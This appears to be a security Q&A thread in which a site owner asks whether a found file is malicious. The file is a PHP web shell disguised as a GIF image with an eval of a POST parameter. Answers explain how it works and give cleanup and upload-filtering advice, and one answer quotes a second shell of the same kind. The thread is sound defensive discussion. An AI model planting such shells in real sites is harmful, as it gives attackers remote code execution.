
I found this file on my server, it contains the following code:

GIF89a
<?php eval ($_POST[plm12345plm]); ?>

There is no other code beside that one above. Is this malicious?

Steve Dodier-Lazaro
Ben Bibikov

3 Answers

15

Yes, this is rogue. This script will execute any PHP code passed as the plm12345plm POST parameter. This means an attacker can execute arbitrary PHP and -- depending on the server configuration -- further code on your server.

The first GIF89a line is likely placed to bypass basic file verification during upload of the script as a GIF image.

If the file could actually be executed, consider the server as compromised. If it is not executable directly, it still could be exploited using local file inclusion attacks.

Jens Erat
6

Yes, this is a PHP web shell. Eval should be the red flag.

Basically, if the user can access this file on your server, they may be able to execute OS commands. If you have properly implemented your site, the attacker should not be able to trick PHP into executing the code in what I am assuming is a .GIF file.

However, if I were you I would batten down the hatches and start your incident response procedures. Someone definitely attempted to break in, and without further research, you won't know if they succeeded.

MrSynAckSter
  • Yes, the site has been compromised. I'm trying to find the problem. First, the index.php at the Wordpress root folder always gets rewritten with a bunch of website links. I delete the links, and the file still gets rewritten after a week or so. Another problem is that my site gets indexed by Google with Japanese characters. Not sure how to fix those two issues. – Ben Bibikov May 04 '15 at 21:47
  • 2
    I would backup your site, and start from scratch. Nuke em from space, it's the only way to be sure. – MrSynAckSter May 04 '15 at 21:48
  • Look up the link above from Jens. You're not addressing the problem if you just remove whatever is being added, because you keep getting compromised. Either the attackers have a reliable exploit for your site (indicating a mistake in your coding or out-of-date software) or they execute a script via a file like the one above on a regular basis to deface your site. In any case, read Jens's link. – Steve Dodier-Lazaro May 04 '15 at 21:56
-1

My server was hacked with the same method. My Server ISP saw huge netload and took the server offline and informed me.

File ali.jpg has textual code: GIF89a?lovealihack <?php eval($_POST[alihackxx])?>

This file was waiting at least since the beginning of 2015 (I traced it back in my backups). It is located in the writable site URL/userfiles/Image directory. When it is called from an outside form with the variable alihackxx and method POST containing PHP code in the variable, the Apache server will execute it as the www-data user, and it contaminated ALL the sites with a writable Media directory, FILE and lots of JPG and PHP files to attack other servers.

It is most likely caused by the (old) FCKeditor I use on all sites, which allows the user to upload a picture that will be inserted in the users site page. There is also a way of pushing data in a writable site/writable directory via the PUT method. It is possible to turn the usage of this method off.

Immediate solution/prevention:
I am shocked to see such a simple vulnerability. I have bad feelings about being hacked. I changed all 777 (writable) directories under the site URL to 755, writable only by the FTP/server user, so Apache (the www-data user) cannot write in them anymore.

ToDo's:
My customers still need to upload JPGs, MP3s and PDFs. They must pass through a proper upload gateway that scans the file for a malicious <?php and the eval(

It is also no fun to adjust the mail forms with file attachments. It is important that the file attachment should not be in a site URL/writable directory.

I hope I informed you guys about this server hack and hope you can prevent your server being hacked.

schroeder